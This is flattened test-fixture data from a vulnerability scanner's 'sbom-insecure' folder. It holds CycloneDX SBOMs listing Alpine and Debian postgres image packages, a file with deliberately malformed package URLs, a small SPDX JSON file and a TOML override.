so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.10-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/bad-purls.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:pypi/ https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:pypi/ https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:/// https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* / https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:pypi/ https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 3.17.2 Alpine Linux v3.17 alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/only-unimportant.spdx.json ================================================ { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/1989157b-1458-4e57-abcb-fbec4a542b9c", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "2025-08-26T01:01:15Z" }, "packages": [ { "name": "libpcre3", "SPDXID": "SPDXRef-Package-libpcre3-9f1e7f2f-24ab-4eb2-8be4-7d3be9403a72", "versionInfo": "2:8.39-12ubuntu0.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the os/dpkg extractor from var/lib/dpkg/status", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:deb/ubuntu/pcre3@2%3A8.39-12ubuntu0.1?arch=amd64\u0026distro=focal\u0026source=pcre3" } ] } ], "relationships": [ ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/postgres-stretch.cdx.xml ================================================ 2023-03-02T12:00:49+11:00 anchore syft 0.73.0 postgres:11.15-stretch sha256:84ac18036f93e18c3d8165e4fd9d9885924bb71beeab042dd50443d4f88fcdda Debian Adduser Developers <adduser-devel@lists.alioth.debian.org> adduser 3.115 GPL-2.0-only cpe:2.3:a:adduser:adduser:3.115:*:*:*:*:*:*:* pkg:deb/debian/adduser@3.115?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/adduser/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/adduser.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/adduser.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 849 APT Development Team <deity@lists.debian.org> apt 1.4.11 GPL-2.0-only GPLv2+ cpe:2.3:a:apt:apt:1.4.11:*:*:*:*:*:*:* pkg:deb/debian/apt@1.4.11?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/apt/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/apt.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/apt.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3539 Santiago Vila <sanvila@debian.org> base-files 9.9+deb9u13 GPL cpe:2.3:a:base-files:base-files:9.9\+deb9u13:*:*:*:*:*:*:* pkg:deb/debian/base-files@9.9+deb9u13?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:base-files:base_files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base_files:base-files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base_files:base_files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base:base-files:9.9\+deb9u13:*:*:*:*:*:*:* cpe:2.3:a:base:base_files:9.9\+deb9u13:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/base-files/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/base-files.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/base-files.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 333 Colin Watson <cjwatson@debian.org> base-passwd 3.5.43 GPL-2.0-only PD cpe:2.3:a:base-passwd:base-passwd:3.5.43:*:*:*:*:*:*:* pkg:deb/debian/base-passwd@3.5.43?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:base-passwd:base_passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base_passwd:base-passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base_passwd:base_passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base:base-passwd:3.5.43:*:*:*:*:*:*:* cpe:2.3:a:base:base_passwd:3.5.43:*:*:*:*:*:*:* 